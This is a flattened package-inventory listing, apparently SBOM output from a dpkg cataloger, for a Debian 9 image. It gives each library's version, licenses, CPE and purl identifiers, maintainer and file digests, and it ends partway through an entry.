NCSA Polly Python U-OF-I-BSD-LIKE public-domain solar-public-domain cpe:2.3:a:libllvm6.0:libllvm6.0:1\:6.0-1\~bpo9\+1:*:*:*:*:*:*:* pkg:deb/debian/libllvm6.0@1:6.0-1~bpo9+1?arch=amd64&upstream=llvm-toolchain-6.0&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/libllvm6.0/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libllvm6.0:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 59860 llvm-toolchain-6.0 Nobuhiro Iwamatsu <iwamatsu@debian.org> liblz4-1 0.0~r131-2+deb9u1 BSD-2-Clause GPL-2.0-only GPL-2.0-or-later cpe:2.3:a:liblz4-1:liblz4-1:0.0\~r131-2\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/liblz4-1@0.0~r131-2+deb9u1?arch=amd64&upstream=lz4&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:liblz4-1:liblz4_1:0.0\~r131-2\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:liblz4_1:liblz4-1:0.0\~r131-2\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:liblz4_1:liblz4_1:0.0\~r131-2\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:liblz4:liblz4-1:0.0\~r131-2\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:liblz4:liblz4_1:0.0\~r131-2\+deb9u1:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/liblz4-1/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/liblz4-1:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 92 lz4 Jonathan Nieder <jrnieder@gmail.com> liblzma5 5.2.2-1.2+deb9u1 Autoconf GPL-2.0-only GPL-2.0-or-later GPL-3.0-only LGPL-2.0-only LGPL-2.1-only LGPL-2.1-or-later PD PD-debian config-h noderivs permissive-fsf permissive-nowarranty probably-PD cpe:2.3:a:liblzma5:liblzma5:5.2.2-1.2\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/liblzma5@5.2.2-1.2+deb9u1?arch=amd64&upstream=xz-utils&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/liblzma5/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/liblzma5:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 338 xz-utils Debian util-linux Maintainers <ah-util-linux@debian.org> libmount1 2.29.2-1+deb9u1 BSD-2-Clause BSD-3-Clause BSD-4-Clause GPL-2.0-only GPL-2.0-or-later GPL-3.0-only GPL-3.0-or-later LGPL LGPL-2.0-only LGPL-2.0-or-later LGPL-2.1-only LGPL-2.1-or-later LGPL-3.0-only LGPL-3.0-or-later MIT public-domain cpe:2.3:a:libmount1:libmount1:2.29.2-1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/libmount1@2.29.2-1+deb9u1?arch=amd64&upstream=util-linux&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libmount1/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libmount1:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 403 util-linux Craig Small <csmall@debian.org> libncurses5 6.0+20161126-1+deb9u2 cpe:2.3:a:libncurses5:libncurses5:6.0\+20161126-1\+deb9u2:*:*:*:*:*:*:* pkg:deb/debian/libncurses5@6.0+20161126-1+deb9u2?arch=amd64&upstream=ncurses&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libtinfo5/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libncurses5:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 287 ncurses Craig Small <csmall@debian.org> libncursesw5 6.0+20161126-1+deb9u2 cpe:2.3:a:libncursesw5:libncursesw5:6.0\+20161126-1\+deb9u2:*:*:*:*:*:*:* pkg:deb/debian/libncursesw5@6.0+20161126-1+deb9u2?arch=amd64&upstream=ncurses&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libtinfo5/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libncursesw5:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 347 ncurses Magnus Holmgren <holmgren@debian.org> libnettle6 3.3-1+deb9u1 GAP GPL GPL-2.0-only GPL-2.0-or-later LGPL LGPL-2.0-only LGPL-2.0-or-later LGPL-2.1-or-later other public-domain cpe:2.3:a:libnettle6:libnettle6:3.3-1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/libnettle6@3.3-1+deb9u1?arch=amd64&upstream=nettle&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/libnettle6/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libnettle6:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 357 nettle Eric Dorland <eric@debian.org> libnpth0 1.3-1 GPL-2.0-only GPL-2.0-or-later LGPL-3.0-only LGPL-3.0-or-later cpe:2.3:a:libnpth0:libnpth0:1.3-1:*:*:*:*:*:*:* pkg:deb/debian/libnpth0@1.3-1?arch=amd64&upstream=npth&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/libnpth0/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libnpth0:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 43 npth Debian SSSD Team <pkg-sssd-devel@lists.alioth.debian.org> libnss-wrapper 1.1.3-1 BSD-3-clauses cpe:2.3:a:libnss-wrapper:libnss-wrapper:1.1.3-1:*:*:*:*:*:*:* pkg:deb/debian/libnss-wrapper@1.1.3-1?arch=amd64&upstream=nss-wrapper&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libnss-wrapper:libnss_wrapper:1.1.3-1:*:*:*:*:*:*:* cpe:2.3:a:libnss_wrapper:libnss-wrapper:1.1.3-1:*:*:*:*:*:*:* cpe:2.3:a:libnss_wrapper:libnss_wrapper:1.1.3-1:*:*:*:*:*:*:* cpe:2.3:a:libnss:libnss-wrapper:1.1.3-1:*:*:*:*:*:*:* cpe:2.3:a:libnss:libnss_wrapper:1.1.3-1:*:*:*:*:*:*:* sha256:01d30ba422c5d9f4a346d59ee398d0ab9882cd9b962e972a68c9c5345c2e4767 /usr/share/doc/libnss-wrapper/copyright sha256:01d30ba422c5d9f4a346d59ee398d0ab9882cd9b962e972a68c9c5345c2e4767 /var/lib/dpkg/info/libnss-wrapper.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 87 nss-wrapper Debian GnuTLS Maintainers <pkg-gnutls-maint@lists.alioth.debian.org> libp11-kit0 0.23.3-2+deb9u1 BSD-3-Clause ISC ISC+IBM permissive-like-automake-output same-as-rest-of-p11kit cpe:2.3:a:libp11-kit0:libp11-kit0:0.23.3-2\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/libp11-kit0@0.23.3-2+deb9u1?arch=amd64&upstream=p11-kit&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libp11-kit0:libp11_kit0:0.23.3-2\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:libp11_kit0:libp11-kit0:0.23.3-2\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:libp11_kit0:libp11_kit0:0.23.3-2\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:libp11:libp11-kit0:0.23.3-2\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:libp11:libp11_kit0:0.23.3-2\+deb9u1:*:*:*:*:*:*:* sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/libp11-kit0/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libp11-kit0:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 439 p11-kit Steve Langasek <vorlon@debian.org> libpam-modules 1.1.8-3.6 GPL cpe:2.3:a:libpam-modules:libpam-modules:1.1.8-3.6:*:*:*:*:*:*:* pkg:deb/debian/libpam-modules@1.1.8-3.6?arch=amd64&upstream=pam&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libpam-modules:libpam_modules:1.1.8-3.6:*:*:*:*:*:*:* cpe:2.3:a:libpam_modules:libpam-modules:1.1.8-3.6:*:*:*:*:*:*:* cpe:2.3:a:libpam_modules:libpam_modules:1.1.8-3.6:*:*:*:*:*:*:* cpe:2.3:a:libpam:libpam-modules:1.1.8-3.6:*:*:*:*:*:*:* cpe:2.3:a:libpam:libpam_modules:1.1.8-3.6:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libpam-modules/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libpam-modules:amd64.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libpam-modules:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 874 pam Steve Langasek <vorlon@debian.org> libpam-modules-bin 1.1.8-3.6 GPL cpe:2.3:a:libpam-modules-bin:libpam-modules-bin:1.1.8-3.6:*:*:*:*:*:*:* pkg:deb/debian/libpam-modules-bin@1.1.8-3.6?arch=amd64&upstream=pam&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libpam-modules-bin:libpam_modules_bin:1.1.8-3.6:*:*:*:*:*:*:* cpe:2.3:a:libpam_modules_bin:libpam-modules-bin:1.1.8-3.6:*:*:*:*:*:*:* cpe:2.3:a:libpam_modules_bin:libpam_modules_bin:1.1.8-3.6:*:*:*:*:*:*:* cpe:2.3:a:libpam-modules:libpam-modules-bin:1.1.8-3.6:*:*:*:*:*:*:* cpe:2.3:a:libpam-modules:libpam_modules_bin:1.1.8-3.6:*:*:*:*:*:*:* cpe:2.3:a:libpam_modules:libpam-modules-bin:1.1.8-3.6:*:*:*:*:*:*:* cpe:2.3:a:libpam_modules:libpam_modules_bin:1.1.8-3.6:*:*:*:*:*:*:* cpe:2.3:a:libpam:libpam-modules-bin:1.1.8-3.6:*:*:*:*:*:*:* cpe:2.3:a:libpam:libpam_modules_bin:1.1.8-3.6:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libpam-modules-bin/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libpam-modules-bin.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 220 pam Steve Langasek <vorlon@debian.org> libpam-runtime 1.1.8-3.6 GPL cpe:2.3:a:libpam-runtime:libpam-runtime:1.1.8-3.6:*:*:*:*:*:*:* pkg:deb/debian/libpam-runtime@1.1.8-3.6?arch=all&upstream=pam&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libpam-runtime:libpam_runtime:1.1.8-3.6:*:*:*:*:*:*:* cpe:2.3:a:libpam_runtime:libpam-runtime:1.1.8-3.6:*:*:*:*:*:*:* cpe:2.3:a:libpam_runtime:libpam_runtime:1.1.8-3.6:*:*:*:*:*:*:* cpe:2.3:a:libpam:libpam-runtime:1.1.8-3.6:*:*:*:*:*:*:* cpe:2.3:a:libpam:libpam_runtime:1.1.8-3.6:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libpam-runtime/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libpam-runtime.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libpam-runtime.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 1016 pam Steve Langasek <vorlon@debian.org> libpam0g 1.1.8-3.6 GPL cpe:2.3:a:libpam0g:libpam0g:1.1.8-3.6:*:*:*:*:*:*:* pkg:deb/debian/libpam0g@1.1.8-3.6?arch=amd64&upstream=pam&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libpam0g/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libpam0g:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 229 pam Matthew Vernon <matthew@debian.org> libpcre3 2:8.39-3 cpe:2.3:a:libpcre3:libpcre3:2\:8.39-3:*:*:*:*:*:*:* pkg:deb/debian/libpcre3@2:8.39-3?arch=amd64&upstream=pcre3&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libpcre3/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libpcre3:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 668 pcre3 Niko Tyni <ntyni@debian.org> libperl5.24 5.24.1-3+deb9u7 Artistic Artistic-2.0 BSD-3-Clause BSD-3-clause-GENERIC BSD-3-clause-with-weird-numbering BSD-4-clause-POWERDOG BZIP DONT-CHANGE-THE-GPL Expat GPL-1.0-only GPL-1.0-or-later GPL-2.0-only GPL-2.0-or-later GPL-3+-WITH-BISON-EXCEPTION HSIEH-BSD HSIEH-DERIVATIVE LGPL-2.1-only REGCOMP REGCOMP, RRA-KEEP-THIS-NOTICE S2P SDBM-PUBLIC-DOMAIN TEXT-TABS Unicode Zlib cpe:2.3:a:libperl5.24:libperl5.24:5.24.1-3\+deb9u7:*:*:*:*:*:*:* pkg:deb/debian/libperl5.24@5.24.1-3+deb9u7?arch=amd64&upstream=perl&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/libperl5.24/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libperl5.24:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 20936 perl Debian PostgreSQL Maintainers <team+postgresql@tracker.debian.org> libpq5 14.2-1.pgdg90+1 Artistic BSD-2-Clause BSD-3-Clause BSD-3-Clause Custom-Unicode Custom-pg_dump Custom-regex GPL-1.0-only PostgreSQL TCL blf double-metaphone imath nagaysau-ishii rijndael cpe:2.3:a:libpq5:libpq5:14.2-1.pgdg90\+1:*:*:*:*:*:*:* pkg:deb/debian/libpq5@14.2-1.pgdg90+1?arch=amd64&upstream=postgresql-14&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/libpq5/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libpq5:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 743 postgresql-14 Matthias Klose <doko@debian.org> libreadline7 7.0-3 GFDL GPL-3.0-only cpe:2.3:a:libreadline7:libreadline7:7.0-3:*:*:*:*:*:*:* pkg:deb/debian/libreadline7@7.0-3?arch=amd64&upstream=readline&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/libreadline7/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libreadline7:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 416 readline Debian Cyrus SASL Team <pkg-cyrus-sasl2-debian-devel@lists.alioth.debian.org> libsasl2-2 2.1.27~101-g0780600+dfsg-3+deb9u2 BSD-4-Clause GPL-3.0-only GPL-3.0-or-later cpe:2.3:a:libsasl2-2:libsasl2-2:2.1.27\~101-g0780600\+dfsg-3\+deb9u2:*:*:*:*:*:*:* pkg:deb/debian/libsasl2-2@2.1.27~101-g0780600+dfsg-3+deb9u2?arch=amd64&upstream=cyrus-sasl2&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libsasl2-2:libsasl2_2:2.1.27\~101-g0780600\+dfsg-3\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:libsasl2_2:libsasl2-2:2.1.27\~101-g0780600\+dfsg-3\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:libsasl2_2:libsasl2_2:2.1.27\~101-g0780600\+dfsg-3\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:libsasl2:libsasl2-2:2.1.27\~101-g0780600\+dfsg-3\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:libsasl2:libsasl2_2:2.1.27\~101-g0780600\+dfsg-3\+deb9u2:*:*:*:*:*:*:* sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/libsasl2-2/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libsasl2-2:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 184 cyrus-sasl2 Debian Cyrus SASL Team <pkg-cyrus-sasl2-debian-devel@lists.alioth.debian.org> libsasl2-modules-db 2.1.27~101-g0780600+dfsg-3+deb9u2 BSD-4-Clause GPL-3.0-only GPL-3.0-or-later cpe:2.3:a:libsasl2-modules-db:libsasl2-modules-db:2.1.27\~101-g0780600\+dfsg-3\+deb9u2:*:*:*:*:*:*:* pkg:deb/debian/libsasl2-modules-db@2.1.27~101-g0780600+dfsg-3+deb9u2?arch=amd64&upstream=cyrus-sasl2&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libsasl2-modules-db:libsasl2_modules_db:2.1.27\~101-g0780600\+dfsg-3\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:libsasl2_modules_db:libsasl2-modules-db:2.1.27\~101-g0780600\+dfsg-3\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:libsasl2_modules_db:libsasl2_modules_db:2.1.27\~101-g0780600\+dfsg-3\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:libsasl2-modules:libsasl2-modules-db:2.1.27\~101-g0780600\+dfsg-3\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:libsasl2-modules:libsasl2_modules_db:2.1.27\~101-g0780600\+dfsg-3\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:libsasl2_modules:libsasl2-modules-db:2.1.27\~101-g0780600\+dfsg-3\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:libsasl2_modules:libsasl2_modules_db:2.1.27\~101-g0780600\+dfsg-3\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:libsasl2:libsasl2-modules-db:2.1.27\~101-g0780600\+dfsg-3\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:libsasl2:libsasl2_modules_db:2.1.27\~101-g0780600\+dfsg-3\+deb9u2:*:*:*:*:*:*:* sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/libsasl2-modules-db/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libsasl2-modules-db:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 97 cyrus-sasl2 Debian SELinux maintainers <selinux-devel@lists.alioth.debian.org> libselinux1 2.6-3+b3 GPL-2.0-only LGPL-2.1-only cpe:2.3:a:libselinux1:libselinux1:2.6-3\+b3:*:*:*:*:*:*:* pkg:deb/debian/libselinux1@2.6-3+b3?arch=amd64&upstream=libselinux%402.6-3&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libselinux1/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libselinux1:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 209 libselinux 2.6-3 Debian SELinux maintainers <selinux-devel@lists.alioth.debian.org> libsemanage-common 2.6-2 GPL LGPL cpe:2.3:a:libsemanage-common:libsemanage-common:2.6-2:*:*:*:*:*:*:* pkg:deb/debian/libsemanage-common@2.6-2?arch=all&upstream=libsemanage&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libsemanage-common:libsemanage_common:2.6-2:*:*:*:*:*:*:* cpe:2.3:a:libsemanage_common:libsemanage-common:2.6-2:*:*:*:*:*:*:* cpe:2.3:a:libsemanage_common:libsemanage_common:2.6-2:*:*:*:*:*:*:* cpe:2.3:a:libsemanage:libsemanage-common:2.6-2:*:*:*:*:*:*:* cpe:2.3:a:libsemanage:libsemanage_common:2.6-2:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libsemanage-common/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libsemanage-common.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libsemanage-common.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 39 libsemanage Debian SELinux maintainers <selinux-devel@lists.alioth.debian.org> libsemanage1 2.6-2 GPL LGPL cpe:2.3:a:libsemanage1:libsemanage1:2.6-2:*:*:*:*:*:*:* pkg:deb/debian/libsemanage1@2.6-2?arch=amd64&upstream=libsemanage&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libsemanage1/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libsemanage1:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 291 libsemanage Debian SELinux maintainers <selinux-devel@lists.alioth.debian.org> libsepol1 2.6-2 GPL LGPL cpe:2.3:a:libsepol1:libsepol1:2.6-2:*:*:*:*:*:*:* pkg:deb/debian/libsepol1@2.6-2?arch=amd64&upstream=libsepol&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libsepol1/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libsepol1:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 653 libsepol Debian util-linux Maintainers <ah-util-linux@debian.org> libsmartcols1 2.29.2-1+deb9u1 BSD-2-Clause BSD-3-Clause BSD-4-Clause GPL-2.0-only GPL-2.0-or-later GPL-3.0-only GPL-3.0-or-later LGPL LGPL-2.0-only LGPL-2.0-or-later LGPL-2.1-only LGPL-2.1-or-later LGPL-3.0-only LGPL-3.0-or-later MIT public-domain cpe:2.3:a:libsmartcols1:libsmartcols1:2.29.2-1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/libsmartcols1@2.29.2-1+deb9u1?arch=amd64&upstream=util-linux&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libsmartcols1/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libsmartcols1:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 257 util-linux Laszlo Boszormenyi (GCS) <gcs@debian.org> libsqlite3-0 3.16.2-5+deb9u3 GPL-2.0-only GPL-2.0-or-later public-domain cpe:2.3:a:libsqlite3-0:libsqlite3-0:3.16.2-5\+deb9u3:*:*:*:*:*:*:* pkg:deb/debian/libsqlite3-0@3.16.2-5+deb9u3?arch=amd64&upstream=sqlite3&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libsqlite3-0:libsqlite3_0:3.16.2-5\+deb9u3:*:*:*:*:*:*:* cpe:2.3:a:libsqlite3_0:libsqlite3-0:3.16.2-5\+deb9u3:*:*:*:*:*:*:* cpe:2.3:a:libsqlite3_0:libsqlite3_0:3.16.2-5\+deb9u3:*:*:*:*:*:*:* cpe:2.3:a:libsqlite3:libsqlite3-0:3.16.2-5\+deb9u3:*:*:*:*:*:*:* cpe:2.3:a:libsqlite3:libsqlite3_0:3.16.2-5\+deb9u3:*:*:*:*:*:*:* sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/libsqlite3-0/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libsqlite3-0:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 1163 sqlite3 Theodore Y. Ts'o <tytso@mit.edu> libss2 1.43.4-2+deb9u2 cpe:2.3:a:libss2:libss2:1.43.4-2\+deb9u2:*:*:*:*:*:*:* pkg:deb/debian/libss2@1.43.4-2+deb9u2?arch=amd64&upstream=e2fsprogs&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libss2/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libss2:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 96 e2fsprogs Debian OpenSSL Team <pkg-openssl-devel@lists.alioth.debian.org> libssl1.1 1.1.0l-1~deb9u5 cpe:2.3:a:libssl1.1:libssl1.1:1.1.0l-1\~deb9u5:*:*:*:*:*:*:* pkg:deb/debian/libssl1.1@1.1.0l-1~deb9u5?arch=amd64&upstream=openssl&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/libssl1.1/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libssl1.1:amd64.md5sums 